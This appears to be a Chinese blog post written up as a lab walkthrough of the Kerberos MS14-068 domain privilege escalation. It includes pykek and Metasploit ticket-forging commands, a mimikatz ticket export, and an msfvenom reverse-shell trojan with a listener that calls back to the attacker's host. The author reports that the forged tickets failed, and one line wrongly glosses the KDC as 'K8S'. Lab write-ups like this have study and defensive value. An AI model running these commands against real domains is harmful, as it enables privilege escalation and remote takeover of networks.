outlook域用户名怎么填_kerberos域用户提权分析

最新推荐文章于 2022-10-31 15:34:29 发布
最新推荐文章于 2022-10-31 15:34:29 发布
阅读量507 收藏
点赞数
文章标签: outlook域用户名怎么填 无需用户名和密码 域验证

ffa4eec16d7372f308e732bb526e2a5a.png

2014年,微软发布了一个紧急补丁,修复了Kerberos域用户提权漏洞(MS14-068),所有的Windows服务器操作系统都受到该漏洞的影响。该漏洞允许攻击者将域内任意用户权限,提升到域管理员级别。如果想利用这个漏洞,把自己变成域控管理员,只需要知道:

  • 域内任意用户名
  • SID
  • 密码
  • 域控IP地址

1a571258319c5c3240ca99a60b682838.png

反正我觉得这本书上,对这一块讲的不咋滴,至少我没看到特权体现在哪?不知道大家怎么看?不过放心,这个知名的漏洞,肯定还会有后续的实验的~

漏洞原理:

  • 用户向KDC(K8S秘钥分发中心)申请TGT(身份凭证)时
  • 用户可以伪造自己的票据
  • 如果票据声明自己有域管理员权限
  • 而KDC在处理该票据时未验证票据的签名
  • 那么返回给用户的TGT就拥有域管理员权限
  • 用户将有域管理员权限的TGT发送到TGS(票据授权服务)
  • 就会获得特权ST(服务票据)
  • 于是可以访问域内的一切资源

步骤一:查看域控制器的补丁

  • 没有KB3011780补丁
  • 存在CVE-2014-6324(MS14-068漏洞)

15655fdd93f0986b88ef966efb931686.png

步骤二:查看用户的SID

  • ailx32:SID=S-1-5-21-1632228486-913648825-264583114-1001
  • Administrator:SID=S-1-5-21-1632228486-913648825-264583114-500

b39149d883362417f445bdb1c709fd79.png

步骤三:克隆pykek

  • 下载地址:github项目
  • ms14-068.py是pykek工具包中的漏洞利用脚本

b52cac33e7454c06051452f29ff36336.png

步骤四:生成高权限票据

  • 普通域用户名:ailx32
  • 域:hackbiji.top
  • 普通SID:S-1-5-21-1632228486-913648825-264583114-1001
  • 域控IP: 192.168.160.143
  • 普通账号密码:W2ngluoanquan 
python ms14-068.py -u ailx32@hackbiji.top -s S-1-5-21-1632228486-913648825-264583114-1001 -d 192.168.160.143 -p W2ngluoanquan

10f677246d1a110124ee5aba3af23070.png

步骤五:验证权限

  • 低权限的票据,无效

5e455c3226235feef6f8e75ed7fb4ec2.png
  • 高权限票据,无效

f2b4f65d4a526e8fe871f72a0647f3c6.png
  • 最后结论就是,我票据确实导入了呀
  • 但是它死活不能用普通身份获得IPC通道

d2347e500b1a17a79607c072f1b8cc82.png
  • 如果知道用户名和密码,那么是可以直接获得IPC通道的呀
  • 何必搞的那么复杂呢?

7e0312558febba4d3e87416e80fdd606.png
  • 更可气的是,我啥也没干,通过管理员权限运行cmd,就已经拿到IPC权限了
  • 蜜汁操作

9d418421bb955e8fd466e5d87b59cc13.png

后续实验来了:抓紧时间收藏~

一、在metasploit中实验

  • 利用ms14-068漏洞
  • 生成20200926141524_default_192.168.160.143_windows.kerberos_231623.bin
  • 需要通过mimikatz进行一下格式转换
use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

a3df98479267eb1df6d707b1b412d697.png

二、在mimikatz中进行格式转换

  • 获得kirbi格式的文件
  • 留着后面提权用
kerberos::clist "20200926141524_default_192.168.160.143_windows.kerberos_231623.bin" /export

936c68958f4ee70de92a21f1b1868560.png

三、生成一个反向shell的木马

  • 获得hack.exe 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.160.140 LPORT=5555 -f exe > hack.exe

2d867e9fbca152d6ab83809aa386777a.png

四、监听木马的来信

  • 通过metasploit监听5555端口
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555

008b7dde1a95ca4c04bf79911002308e.png

五、鱼儿上钩

  • 获得普通权限 hackbijiailx32

53656c1d00cd9e2bda3b74143b575741.png

六、导入票据

  • 狗屁,报错(Kerberos ticket application failed.)
  • 骗子

a6d726220cb99890f30ec9833cd13b55.png

本篇完~

weixin_39773158
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第5章内横向移动分析及防御
willow_liang的博客
12-26 3901
第5章内横向移动分析及防御 内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和与业务相关的关键账户。因此,必须使用强口令来保护特权用户不被
红队专题-内网横向-工作组Workgroup与 Domain Active Directory渗透
aming小老弟
12-21 1135
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得管理员权限,即可控制内所有用户和主机,因此活动目录环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
outlook用户名怎么_内网渗透 | 搭建环境
weixin_39853155的博客
12-05 1863
搭建环境目录部署架构如何加入中主机的登录SRV出错及解决办法SRV记录注册不成功的可能原因禁用中的账户将计算机退出添加用户部署结构在架构中,最核心的就是DC(Domain Control,控制器),创建首先要创建DC,DC创建完成后,把所有的客户端加入到DC,这样就形成了环境。控制器是由工作组计算机升级而成,通过 dcpromo 命令就可...
全平台系统提权辅助工具 PEASS-ng
LuckySec
04-27 6457
0x01 PEASS-ng 介绍 PEAS-ng 是一款适用于 Windows 和 Linux/Unix* 和 MacOS 的权限提升工具。 项目地址:https://github.com/carlospolop/PEASS-ng PEAS-ng 工具搜索可能的本地权限提升路径,可以利用这些路径并将它们以漂亮的颜色打印输出,可以方便轻松识别错误配置。 检查来自book.hacktricks.xyz的本地 Windows 权限提升清单 WinPEAS - Windows 本地权限提权脚本(C#.exe
第5章 内横向移动分析及防御
weixin_44286136的博客
10-31 1437
内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、控制器或其他重要资产)。
认证流程
只有不断学习才不会被茫茫人海淹没!
04-05 5565
认证流程一、首先你必须知道的名词含义二、粗略流程三级目录 一、首先你必须知道的名词含义 DC: Domain Controller 控 KDC: Key Distribution Center 密钥分发中心 AD: Account Database 账户数据库 AS: Authentication Service 身份验证服务 TGS: Ticket Granting Service 票据授与服务 TGT: Ticket Granting Ticket 票据中心授予的票据 二、粗略
排查账户频繁锁定
qishine的专栏
12-02 8830
最近2周一直被一个问题困扰,有用户频繁被锁定。但是无法找到用户从哪里发送的验证信息。 原因是为了加强安全监控,启用了用户账户锁定的通知。这个锁定通知是通过事件日志结合计划任务发送的,具体如何操作可以参考之前的文章《监控账户登录》或者《Windows 2012 R2 计划任务发送邮件》。 账户被锁定的唯一原因就是频繁的提供错误凭据做身份验证。当错误次数超过组策略里配置的限制次数后就会被锁定一段时间。锁定时间同样也是在组策略里配置的。这种锁定策略可以有效的保护账户安全,避免暴力破解。 现在账户被频繁锁定,
实例使用NTLM验证整合Squid及Samba3实现AD用户认证
fdayok的专栏
09-01 1957
<br />http://romexp.blog.163.com/blog/static/3610065200762614516829/<br /> <br />Windows的IIS中有项配置使用集成的Windows验证,在AD的环境中我们可以通过启用集成的Windows验证来使用用户登陆Windows 系统的帐号进行认证,在用户访问网页时,IE会将用户的帐号凭据发往服务器自动做认证,不需要用户输入用户名密码。最好的例子就是用户登陆 Outlook Web Access(OWA)。当我们利用Squid做
linux saslauth用户,Linux中Postfix邮件认证配置(五)
weixin_30670745的博客
04-29 793
原标题:Linux中Postfix邮件认证配置(五) Postfix+Dovecot+Sasl工作原理1.A用户使用MUA客户端借助smtp协议登陆smtpd服务器,需要先进行用户密码认证,而SMTPD服务器端支持sasl认证,例如有一个sasl客户端,就会去连接SASL。当SASL接受到验证请求时就会根据验证方式去进行验证,常用的有PAM,passwd等。验证成功后就会返回给Smtpd服务器。...
《内网安全攻防:渗透测试实战指南》读书笔记(五):内横向移动分析及防御
闵行小鱼塘
04-18 5239
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章系统的介绍了内横向移动的主要方法,复现并剖析了内网方面最重要、最经典的漏洞,同时给出了相应的防范方法
kerberos.rar_Kerberos_kerberos Java_single_sso java
07-15
Kerberos协议主要用于计算机网络的身份鉴别(Authentication), 其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的票据(ticket-granting ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和...
JAAS.rar_Kerberos_jaas_ldap kerberos
09-14
它让你能够将一些标准的安全机制,例如Solaris NIS(网络信息服务)、Windows NT、LDAP(轻量目录存取协议),Kerberos等通过一种通用的,可配置的方式集成到系统中。本文首先向你介绍JAAS验证中的一些核心部分,...
JAAS.rar_Action!_Jaas Kerber_jaas KERBEROS_kerberos Java_login.a
09-24
_Jaas_Kerber_jaas_KERBEROS_kerberos_Java_login.a"压缩包文件包含了关于如何在Java环境中使用JAAS实现Kerberos登录和委托的示例代码。Kerberos是一种广泛使用的网络身份验证协议,它提供了强大的安全性,通过一次...
iisadmpwd windows用户web密码更改asp源码
12-27
这通常涉及到NTLM或Kerberos协议,这些协议能验证用户的身份,并且在Windows环境中广泛使用。 3. **AD通信**:源码中的关键部分是与Active Directory(AD)进行通信的代码。它会利用AD的Directory Services API...
渗透中的DPAPI和Kerberos协议.pdf
08-08
议题分享主要介绍了渗透中数据保护API架构逻辑和Kerberos认证协议的通信流程,同时从攻击者的角度谈了DPAPI和Kerberos协议的利用,最后给出常见攻击思路的防御和缓解措施。 1.1 DPAPI架构 1.2 DPAPI加密机制 1.3 ...
方案-基于云架构的校园信息化建设方案.pdf
最新发布
07-29
方案-基于云架构的校园信息化建设方案.pdf
【创新未发表】Matlab实现蛇群优化算法SO-Kmean-Transformer-LSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现北方苍鹰优化算法NGO-Kmean-Transformer-LSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现蝗虫优化算法GOA-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
No module named 'requests_kerberos'
05-21
"requests_kerberos" 是一个Python第三方库,用于在使用Kerberos协议进行身份验证时使用。如果您的Python程序引用了该库但无法导入该库,可能有以下原因: 1. 您尚未安装 "requests_kerberos" 库。您可以使用命令 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值